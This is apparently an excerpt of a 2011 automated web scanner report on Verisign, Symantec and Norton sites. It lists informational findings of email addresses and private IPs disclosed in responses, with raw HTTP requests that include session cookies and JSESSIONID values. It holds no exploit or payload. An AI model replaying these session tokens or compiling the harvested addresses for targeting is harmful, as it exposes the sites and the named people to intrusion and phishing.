Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 56081
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

17.39. http://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.40. http://query.verisign.com/uri.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/uri.js

Issue detail

The following email address was disclosed in the response:

msamuel@google.com

Request

GET /uri.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 17596
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

17.41. https://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.42. https://renewals.symantec.com/renewals/chat_form.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/chat_form.jsp

Issue detail

The following email address was disclosed in the response:

sales@symantecsmbrenewals.com

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:39:05 GMT
Content-Type: text/html
Content-Length: 15726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">





<html>
<head><ti
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...

17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/symantec_omniture/s_code_20100217.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:37 GMT
Content-Length: 30123
Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

/* Rainmaker changes to set the report suite. */
if (location.href.inde
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

17.44. http://us.norton.com/beta/overview.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/beta/overview.jsp

Issue detail

The following email address was disclosed in the response:

betafeedback@symantec.com

Request

Response

17.45. http://us.norton.com/familyresources/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/familyresources/index.jsp

Issue detail

The following email addresses were disclosed in the response:

advertising@norton.com
marian@norton.com

Request

GET /familyresources/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=64
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67586

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults
...[SNIP]...
<a href="mailto:marian@norton.com">
...[SNIP]...
<a href="mailto:advertising@norton.com">
...[SNIP]...

17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/scripts/colorbox/norton/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /scripts/colorbox/norton/jquery.colorbox-min.js HTTP/1.1
Host: us.norton.com
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNORTDC=0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 09 Feb 2011 19:22:17 GMT
ETag: "23e8-4d52e969"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 9192
Cache-Control: public, max-age=2112
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...

17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmanager.verisign.com
Path:	/vipmgr/createtrialaccount.v

Issue detail

The following email address was disclosed in the response:

viptrial-support@verisign.com

Request

GET /vipmgr/createtrialaccount.v HTTP/1.1
Host: vipmanager.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>

<META http-equiv="Content-Type" content="te
...[SNIP]...
<a href="mailto:viptrial-support@verisign.com">viptrial-support@verisign.com</a>
...[SNIP]...

17.48. http://vipmobile.verisign.com/home.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vipmobile.verisign.com
Path:	/home.v

Issue detail

The following email address was disclosed in the response:

vipmobile@verisign.com

Request

GET /home.v HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:50 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Content-Length: 16260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...

17.49. https://vipmobile.verisign.com/home.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/home.v

Issue detail

The following email address was disclosed in the response:

vipmobile@verisign.com

Request

GET /home.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:06 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 16260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...

17.50. https://vipmobile.verisign.com/supportedphones.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/supportedphones.v

Issue detail

The following email address was disclosed in the response:

vipmobile@verisign.com

Request

GET /supportedphones.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:46 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 1508897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...
<a href="mailto:vipmobile@verisign.com" style="white-space:nowrap;">vipmobile@verisign.com</a>
...[SNIP]...

17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/about/profile/policies/privacy.jsp

Issue detail

The following email address was disclosed in the response:

privacy@symantec.com

Request

GET /about/profile/policies/privacy.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1721
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Complete Privacy Policy - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="mailto:privacy@symantec.com">privacy@symantec.com</a>
...[SNIP]...
<a href="mailto:privacy@symantec.com">privacy@symantec.com</a>
...[SNIP]...

17.52. http://www.symantec.com/business/theme.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/theme.jsp

Issue detail

The following email addresses were disclosed in the response:

billing@verisign.com
channel-partners@verisign.com
eca-authentication@verisign.com
eca-sales@verisign.com
eca-support@verisign.com
renewals-team@verisign.com
verisales@verisign.com

Request

Response

17.53. http://www.symantec.com/connect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/

Issue detail

The following email address was disclosed in the response:

Customer_Certifications@Symantec.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000
Vary: Cookie
ETag: "1315602201"
Content-Type: text/html; charset=utf-8
X-Varnish: 1369354087 1369326710
X-Varnish-Cache: HIT
X-Varnish-Hits: 287
Vary: Accept-Encoding
Content-Length: 80043
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
Exams for FREE – Register now!
The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE!  Email Customer_Certifications@Symantec.com or Partner... </div>
...[SNIP]...

17.54. http://www.symantec.com/searchg/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/searchg/common.js

Issue detail

The following email address was disclosed in the response:

jlim@google.com

Request

GET /searchg/common.js HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT
ETag: "db11-4b96e1c8"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 56081
Cache-Control: public, max-age=5333
Date: Fri, 09 Sep 2011 21:33:14 GMT
Connection: close

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

17.55. http://www.symantec.com/searchg/uri.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/searchg/uri.js

Issue detail

The following email address was disclosed in the response:

msamuel@google.com

Request

GET /searchg/uri.js HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT
ETag: "44bc-4b96e1c8"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 17596
Cache-Control: public, max-age=5296
Date: Fri, 09 Sep 2011 21:33:14 GMT
Connection: close

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

17.56. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.57. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The following email addresses were disclosed in the response:

billing@verisign.ch
channel-partners@verisign.com
enterprise-sales@verisign.ch
sales@verisign.ch

Request

Response

17.58. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.59. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.60. http://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Issue detail

The following email addresses were disclosed in the response:

channel-partners@verisign.com
support@verisign.com

Request

Response

17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1614
Content-Type: text/html

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.63. http://www.verisign.com/code-signing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/code-signing/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/ssl/buy-ssl-certificates/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.68. http://www.verisign.com/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/trust-seal/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.69. http://www.verisign.com/verisign-worldwide/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/verisign-worldwide/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.70. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.71. https://www.verisign.com/products-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/products-services/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

18. Private IP addresses disclosed previous next
There are 3 instances of this issue:

http://query.verisign.com/cluster.js
http://query.verisign.com/search
https://query.verisign.com/search

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

